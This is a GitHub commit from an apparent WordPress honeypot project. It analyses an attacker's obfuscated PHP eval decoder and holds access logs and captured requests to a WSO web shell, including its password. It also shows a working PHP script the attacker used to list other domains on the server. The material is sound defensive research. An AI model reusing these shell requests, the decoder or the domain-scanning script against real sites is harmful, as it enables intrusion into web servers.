Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
92b18c6
commit 6eed188
Showing
64 changed files
with
5,857 additions
and
4 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
# fUUPd - Common Decoder #1 | ||
|
||
A fairly basic decoder. | ||
|
||
## Origin | ||
|
||
### IP Address 195.154.220.30 | ||
|
||
195.154.220.30 has DNS name 30.220.154.rdns.systems | ||
|
||
`rdns.systems` has this `whois` info: | ||
|
||
Domain Name: rdns.systems | ||
Tech Organization: Technology LLC | ||
Tech Street: c/o IDPS International Domain Privacy Services GmbH Hansaallee 191 | ||
Tech City: Duesseldorf | ||
Tech State/Province: | ||
Tech Postal Code: 40549 | ||
Tech Country: DE | ||
|
||
195.154.220.30 has different `whois` info: | ||
|
||
route: 195.154.0.0/16 | ||
descr: Online SAS | ||
descr: Paris, France | ||
origin: AS12876 | ||
mnt-by: MNT-TISCALIFR | ||
created: 2013-08-02T09:05:22Z | ||
last-modified: 2013-08-02T09:05:22Z | ||
|
||
### Download | ||
|
||
The attacker intended to use a WSO, "Web Shell by oRb" instance | ||
to download the code to my WordPress honey pot. The attacker | ||
wanted to use the "FilesMan" action of WSO, "uploadFile" sub-action. | ||
|
||
This would leave a file behind. | ||
|
||
## Decoder | ||
|
||
<?php | ||
function fUUPd($NVAR) | ||
{ | ||
$NVAR = gzinflate(base64_decode($NVAR)); | ||
for ($i = 0; $i < strlen($NVAR); $i++) { | ||
$NVAR[$i] = chr(ord($NVAR[$i]) - 1); | ||
} | ||
return $NVAR; | ||
} | ||
eval(fUUPd("jbvnz.../9y//5f/x/")); | ||
|
||
Decompresses decoded Base64-encoded bytes, then shifts them one | ||
(numeric) value down. So for ASCII text, 'G' (0x47 as a number) | ||
would become 'F' (0x46 as a number). That counts as a "Caesar Cipher". | ||
|
||
Makes no attempt to hide the `base64_decode()` or `eval()` function calls, | ||
but the function name `fUUPd` does seem to be obfuscated. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
195.154.220.30 - - [19/Mar/2018:05:31:45 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 83590 "-" "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0" | ||
195.154.220.30 - - [19/Mar/2018:05:31:48 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0" | ||
195.154.220.30 - - [21/Mar/2018:13:29:34 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 83590 "-" "Mozilla/5.0 (Windows NT 6.0; rv:25.0) Gecko/20100101 Firefox/25.0" | ||
195.154.220.30 - - [21/Mar/2018:13:29:35 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0" | ||
195.154.220.30 - - [21/Mar/2018:14:35:05 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:14:35:05 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:14:35:06 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 21865 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:14:35:07 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 21865 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:00:58 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:00:59 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 21865 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:00 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:01 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 21865 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:02 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:03 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:04 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:05 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:06 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:08 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" |
60 changes: 60 additions & 0 deletions
60
fUUPd/files/195.154.220.30Wq@foTrMiYwata7o4pkQbgAAAAI.wso.scans
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,60 @@ | ||
|
||
_SERVER | ||
Array | ||
( | ||
[UNIQUE_ID] => Wq@foTrMiYwata7o4pkQbgAAAAI | ||
[SCRIPT_URL] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[SCRIPT_URI] => http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[HTTP_HOST] => stratigery.com | ||
[HTTP_CONNECTION] => close | ||
[HTTP_ACCEPT_ENCODING] => gzip,deflate | ||
[CONTENT_TYPE] => application/x-www-form-urlencoded | ||
[CONTENT_LENGTH] => 25 | ||
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0 | ||
[PATH] => /usr/local/sbin:/usr/local/bin:/usr/bin | ||
[SERVER_SIGNATURE] => | ||
[SERVER_SOFTWARE] => Apache/2.4.29 (Unix) PHP/7.2.3 | ||
[SERVER_NAME] => stratigery.com | ||
[SERVER_ADDR] => 162.246.45.144 | ||
[SERVER_PORT] => 80 | ||
[REMOTE_ADDR] => 195.154.220.30 | ||
[DOCUMENT_ROOT] => /srv/http/stratigery/htdocs | ||
[REQUEST_SCHEME] => http | ||
[CONTEXT_PREFIX] => | ||
[CONTEXT_DOCUMENT_ROOT] => /srv/http/stratigery/htdocs | ||
[SERVER_ADMIN] => bediger@stratigery.com | ||
[SCRIPT_FILENAME] => /srv/http/stratigery/htdocs/fake_wp/wso.php | ||
[REMOTE_PORT] => 51792 | ||
[GATEWAY_INTERFACE] => CGI/1.1 | ||
[SERVER_PROTOCOL] => HTTP/1.1 | ||
[REQUEST_METHOD] => POST | ||
[QUERY_STRING] => | ||
[REQUEST_URI] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[SCRIPT_NAME] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[PHP_SELF] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[REQUEST_TIME_FLOAT] => 1521459105.41 | ||
[REQUEST_TIME] => 1521459105 | ||
) | ||
|
||
_REQUEST | ||
Array | ||
( | ||
[a] => Php | ||
[p2] => info | ||
[pass] => nhzgrf | ||
) | ||
|
||
_COOKIE | ||
Array | ||
( | ||
) | ||
|
||
_FILES | ||
|
||
END _FILES | ||
$my_blog=http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider | ||
pass parameter, acting as WSO | ||
Acting as WSO, login cookie. | ||
a = Php | ||
p2 = info | ||
Acting as WSO, send phpinfo. |
20 changes: 20 additions & 0 deletions
20
fUUPd/files/195.154.220.30Wq@fpMO6JG7vg4KcqrwY8wAAAAU.php.file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
error_reporting(0); | ||
$startDir = str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']); | ||
$domZones = '(\.ru|\.ru\.com|\.ru\.net|\.com\.ru|\.org\.ru|\.net\.ru|\.msk\.ru|\.msk\.su|\.spb\.ru|\.spb\.su|\.nov\.ru|\.nov\.su|\.edu\.ru|\.int\.ru|\.ac\.ru|\.pp\.ru|\.su|\.ua|\.com\.ua|\.co\.ua|\.biz\.ua|\.kiev\.ua|\.org\.ua|\.net\.ua|\.pp\.ua|\.dp\.ua|\.sumy\.ua|\.uz\.ua|ks\.ua|\.pl\.ua|\.if\.ua|\.cv\.ua|\.rv\.ua|\.mk\.ua|\.dn\.ua|\.lg\.ua|\.kh\.ua|\.zp\.ua|\.od\.ua|\.ck\.ua|\.kr\.ua|\.lutsk\.ua|\.volin\.ua|\.zt\.ua|\.yalta\.ua|\.sevastopol\.ua|\.cremea\.ua|\.com|\.edu|\.gov|\.net|\.org|\.biz|\.info|\.name|\.jobs|\.mobi|\.tel|\.travel|\.az|\.am|\.by|\.ge|\.kz|\.kg|\.lv|\.lt|\.md|\.ru|\.su|\.tj|\.tm|\.uz|\.ua|\.ad|\.at|\.be|\.ch|\.de|\.dk|\.es|\.eu|\.fi|\.fr|\.gr|\.ie|\.is|\.it|\.li|\.lu|\.mc|\.mt|\.nl|\.no|\.pt|\.se|\.uk|\.al|\.bg|\.cz|\.hu|\.mk|\.pl|\.ro|\.si|\.sk|\.ac|\.ag|\.as|\.asia|\.au|\.br|\.bz|\.ca|\.cat|\.cc|\.cd|\.ck|\.cl|\.cn|\.cx|\.gi|\.gs|\.hk|\.hm|\.hn|\.im|\.in|\.jp|\.kr|\.la|\.lk|\.me|\.mn|\.ms|\.mx|\.my|\.nz|\.pk|\.sg|\.sh|\.st|\.tc|\.th|\.tk|\.to|\.tv|\.tw|\.us|\.vc|\.vg|\.ws|\.za)'; | ||
|
||
function GetDomains($dirs, $preDomainPath, $postDomainPath, $domZones) { | ||
foreach($dirs as $dir) { | ||
if(preg_match('#'.$domZones.'(\/(.*?)$|$)#', $dir, $matches) && !preg_match('#('.str_replace('www.', '', $_SERVER['HTTP_HOST']).')|('.$_SERVER['HTTP_HOST'].')#', $dir)) { | ||
$domainPath = rtrim($preDomainPath.'/'.$dir.'/'.$postDomainPath, '/'); | ||
if(is_dir($domainPath)) { | ||
echo $domainPath.';'.$dir.'@'; | ||
} | ||
} | ||
} | ||
} | ||
|
||
GetDomains(scandir($startDir), $startDir, '', $domZones); | ||
if(preg_match('#^(.*?)\/([^\/]+'.$domZones.')\/*(.*?)$#', $startDir, $matches)) { | ||
$domainDirs = scandir($matches[1]); | ||
GetDomains($domainDirs, $matches[1], $matches[4], $domZones); | ||
}; |
98 changes: 98 additions & 0 deletions
98
fUUPd/files/195.154.220.30Wq@fpMO6JG7vg4KcqrwY8wAAAAU.wso.scans
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,98 @@ | ||
|
||
_SERVER | ||
Array | ||
( | ||
[UNIQUE_ID] => Wq@fpMO6JG7vg4KcqrwY8wAAAAU | ||
[SCRIPT_URL] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[SCRIPT_URI] => http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[HTTP_HOST] => stratigery.com | ||
[HTTP_CONNECTION] => close | ||
[HTTP_ACCEPT_ENCODING] => gzip,deflate | ||
[CONTENT_TYPE] => application/x-www-form-urlencoded | ||
[CONTENT_LENGTH] => 3010 | ||
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0 | ||
[HTTP_COOKIE] => d8670190bc460b6abebf276d20db5892=866fd58d77526c1bda8771b5b21d5b11 | ||
[PATH] => /usr/local/sbin:/usr/local/bin:/usr/bin | ||
[SERVER_SIGNATURE] => | ||
[SERVER_SOFTWARE] => Apache/2.4.29 (Unix) PHP/7.2.3 | ||
[SERVER_NAME] => stratigery.com | ||
[SERVER_ADDR] => 162.246.45.144 | ||
[SERVER_PORT] => 80 | ||
[REMOTE_ADDR] => 195.154.220.30 | ||
[DOCUMENT_ROOT] => /srv/http/stratigery/htdocs | ||
[REQUEST_SCHEME] => http | ||
[CONTEXT_PREFIX] => | ||
[CONTEXT_DOCUMENT_ROOT] => /srv/http/stratigery/htdocs | ||
[SERVER_ADMIN] => bediger@stratigery.com | ||
[SCRIPT_FILENAME] => /srv/http/stratigery/htdocs/fake_wp/wso.php | ||
[REMOTE_PORT] => 51964 | ||
[GATEWAY_INTERFACE] => CGI/1.1 | ||
[SERVER_PROTOCOL] => HTTP/1.1 | ||
[REQUEST_METHOD] => POST | ||
[QUERY_STRING] => | ||
[REQUEST_URI] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[SCRIPT_NAME] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[PHP_SELF] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[REQUEST_TIME_FLOAT] => 1521459108.645 | ||
[REQUEST_TIME] => 1521459108 | ||
) | ||
|
||
_REQUEST | ||
Array | ||
( | ||
[a] => Php | ||
[p1] => error_reporting(0); | ||
$startDir = str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']); | ||
$domZones = '(\.ru|\.ru\.com|\.ru\.net|\.com\.ru|\.org\.ru|\.net\.ru|\.msk\.ru|\.msk\.su|\.spb\.ru|\.spb\.su|\.nov\.ru|\.nov\.su|\.edu\.ru|\.int\.ru|\.ac\.ru|\.pp\.ru|\.su|\.ua|\.com\.ua|\.co\.ua|\.biz\.ua|\.kiev\.ua|\.org\.ua|\.net\.ua|\.pp\.ua|\.dp\.ua|\.sumy\.ua|\.uz\.ua|ks\.ua|\.pl\.ua|\.if\.ua|\.cv\.ua|\.rv\.ua|\.mk\.ua|\.dn\.ua|\.lg\.ua|\.kh\.ua|\.zp\.ua|\.od\.ua|\.ck\.ua|\.kr\.ua|\.lutsk\.ua|\.volin\.ua|\.zt\.ua|\.yalta\.ua|\.sevastopol\.ua|\.cremea\.ua|\.com|\.edu|\.gov|\.net|\.org|\.biz|\.info|\.name|\.jobs|\.mobi|\.tel|\.travel|\.az|\.am|\.by|\.ge|\.kz|\.kg|\.lv|\.lt|\.md|\.ru|\.su|\.tj|\.tm|\.uz|\.ua|\.ad|\.at|\.be|\.ch|\.de|\.dk|\.es|\.eu|\.fi|\.fr|\.gr|\.ie|\.is|\.it|\.li|\.lu|\.mc|\.mt|\.nl|\.no|\.pt|\.se|\.uk|\.al|\.bg|\.cz|\.hu|\.mk|\.pl|\.ro|\.si|\.sk|\.ac|\.ag|\.as|\.asia|\.au|\.br|\.bz|\.ca|\.cat|\.cc|\.cd|\.ck|\.cl|\.cn|\.cx|\.gi|\.gs|\.hk|\.hm|\.hn|\.im|\.in|\.jp|\.kr|\.la|\.lk|\.me|\.mn|\.ms|\.mx|\.my|\.nz|\.pk|\.sg|\.sh|\.st|\.tc|\.th|\.tk|\.to|\.tv|\.tw|\.us|\.vc|\.vg|\.ws|\.za)'; | ||
|
||
function GetDomains($dirs, $preDomainPath, $postDomainPath, $domZones) { | ||
foreach($dirs as $dir) { | ||
if(preg_match('#'.$domZones.'(\/(.*?)$|$)#', $dir, $matches) && !preg_match('#('.str_replace('www.', '', $_SERVER['HTTP_HOST']).')|('.$_SERVER['HTTP_HOST'].')#', $dir)) { | ||
$domainPath = rtrim($preDomainPath.'/'.$dir.'/'.$postDomainPath, '/'); | ||
if(is_dir($domainPath)) { | ||
echo $domainPath.';'.$dir.'@'; | ||
} | ||
} | ||
} | ||
} | ||
|
||
GetDomains(scandir($startDir), $startDir, '', $domZones); | ||
if(preg_match('#^(.*?)\/([^\/]+'.$domZones.')\/*(.*?)$#', $startDir, $matches)) { | ||
$domainDirs = scandir($matches[1]); | ||
GetDomains($domainDirs, $matches[1], $matches[4], $domZones); | ||
}; | ||
) | ||
|
||
_COOKIE | ||
Array | ||
( | ||
[d8670190bc460b6abebf276d20db5892] => 866fd58d77526c1bda8771b5b21d5b11 | ||
) | ||
|
||
_FILES | ||
|
||
END _FILES | ||
$my_blog=http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider | ||
Acting as WSO, login cookie. | ||
a = Php | ||
p1 = error_reporting(0); | ||
$startDir = str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']); | ||
$domZones = '(\.ru|\.ru\.com|\.ru\.net|\.com\.ru|\.org\.ru|\.net\.ru|\.msk\.ru|\.msk\.su|\.spb\.ru|\.spb\.su|\.nov\.ru|\.nov\.su|\.edu\.ru|\.int\.ru|\.ac\.ru|\.pp\.ru|\.su|\.ua|\.com\.ua|\.co\.ua|\.biz\.ua|\.kiev\.ua|\.org\.ua|\.net\.ua|\.pp\.ua|\.dp\.ua|\.sumy\.ua|\.uz\.ua|ks\.ua|\.pl\.ua|\.if\.ua|\.cv\.ua|\.rv\.ua|\.mk\.ua|\.dn\.ua|\.lg\.ua|\.kh\.ua|\.zp\.ua|\.od\.ua|\.ck\.ua|\.kr\.ua|\.lutsk\.ua|\.volin\.ua|\.zt\.ua|\.yalta\.ua|\.sevastopol\.ua|\.cremea\.ua|\.com|\.edu|\.gov|\.net|\.org|\.biz|\.info|\.name|\.jobs|\.mobi|\.tel|\.travel|\.az|\.am|\.by|\.ge|\.kz|\.kg|\.lv|\.lt|\.md|\.ru|\.su|\.tj|\.tm|\.uz|\.ua|\.ad|\.at|\.be|\.ch|\.de|\.dk|\.es|\.eu|\.fi|\.fr|\.gr|\.ie|\.is|\.it|\.li|\.lu|\.mc|\.mt|\.nl|\.no|\.pt|\.se|\.uk|\.al|\.bg|\.cz|\.hu|\.mk|\.pl|\.ro|\.si|\.sk|\.ac|\.ag|\.as|\.asia|\.au|\.br|\.bz|\.ca|\.cat|\.cc|\.cd|\.ck|\.cl|\.cn|\.cx|\.gi|\.gs|\.hk|\.hm|\.hn|\.im|\.in|\.jp|\.kr|\.la|\.lk|\.me|\.mn|\.ms|\.mx|\.my|\.nz|\.pk|\.sg|\.sh|\.st|\.tc|\.th|\.tk|\.to|\.tv|\.tw|\.us|\.vc|\.vg|\.ws|\.za)'; | ||
|
||
function GetDomains($dirs, $preDomainPath, $postDomainPath, $domZones) { | ||
foreach($dirs as $dir) { | ||
if(preg_match('#'.$domZones.'(\/(.*?)$|$)#', $dir, $matches) && !preg_match('#('.str_replace('www.', '', $_SERVER['HTTP_HOST']).')|('.$_SERVER['HTTP_HOST'].')#', $dir)) { | ||
$domainPath = rtrim($preDomainPath.'/'.$dir.'/'.$postDomainPath, '/'); | ||
if(is_dir($domainPath)) { | ||
echo $domainPath.';'.$dir.'@'; | ||
} | ||
} | ||
} | ||
} | ||
|
||
GetDomains(scandir($startDir), $startDir, '', $domZones); | ||
if(preg_match('#^(.*?)\/([^\/]+'.$domZones.')\/*(.*?)$#', $startDir, $matches)) { | ||
$domainDirs = scandir($matches[1]); | ||
GetDomains($domainDirs, $matches[1], $matches[4], $domZones); | ||
}; | ||
Acting as WSO PHP eval, recognized GetDomains. |
60 changes: 60 additions & 0 deletions
60
fUUPd/files/195.154.220.30WqmW4mED2UVKHNYWN2GUbAAAAAU.wso.scans
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,60 @@ | ||
|
||
_SERVER | ||
Array | ||
( | ||
[UNIQUE_ID] => WqmW4mED2UVKHNYWN2GUbAAAAAU | ||
[SCRIPT_URL] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[SCRIPT_URI] => http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[HTTP_HOST] => stratigery.com | ||
[HTTP_CONNECTION] => close | ||
[HTTP_ACCEPT_ENCODING] => gzip,deflate | ||
[CONTENT_TYPE] => application/x-www-form-urlencoded | ||
[CONTENT_LENGTH] => 25 | ||
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows NT 6.0; rv:25.0) Gecko/20100101 Firefox/25.0 | ||
[PATH] => /usr/local/sbin:/usr/local/bin:/usr/bin | ||
[SERVER_SIGNATURE] => | ||
[SERVER_SOFTWARE] => Apache/2.4.29 (Unix) PHP/7.2.3 | ||
[SERVER_NAME] => stratigery.com | ||
[SERVER_ADDR] => 162.246.45.144 | ||
[SERVER_PORT] => 80 | ||
[REMOTE_ADDR] => 195.154.220.30 | ||
[DOCUMENT_ROOT] => /srv/http/stratigery/htdocs | ||
[REQUEST_SCHEME] => http | ||
[CONTEXT_PREFIX] => | ||
[CONTEXT_DOCUMENT_ROOT] => /srv/http/stratigery/htdocs | ||
[SERVER_ADMIN] => bediger@stratigery.com | ||
[SCRIPT_FILENAME] => /srv/http/stratigery/htdocs/fake_wp/wso.php | ||
[REMOTE_PORT] => 64216 | ||
[GATEWAY_INTERFACE] => CGI/1.1 | ||
[SERVER_PROTOCOL] => HTTP/1.1 | ||
[REQUEST_METHOD] => POST | ||
[QUERY_STRING] => | ||
[REQUEST_URI] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[SCRIPT_NAME] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[PHP_SELF] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[REQUEST_TIME_FLOAT] => 1521063650.808 | ||
[REQUEST_TIME] => 1521063650 | ||
) | ||
|
||
_REQUEST | ||
Array | ||
( | ||
[a] => Php | ||
[p2] => info | ||
[pass] => nhzgrf | ||
) | ||
|
||
_COOKIE | ||
Array | ||
( | ||
) | ||
|
||
_FILES | ||
|
||
END _FILES | ||
$my_blog=http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider | ||
pass parameter, acting as WSO | ||
Acting as WSO, login cookie. | ||
a = Php | ||
p2 = info | ||
Acting as WSO, send phpinfo. |
Oops, something went wrong.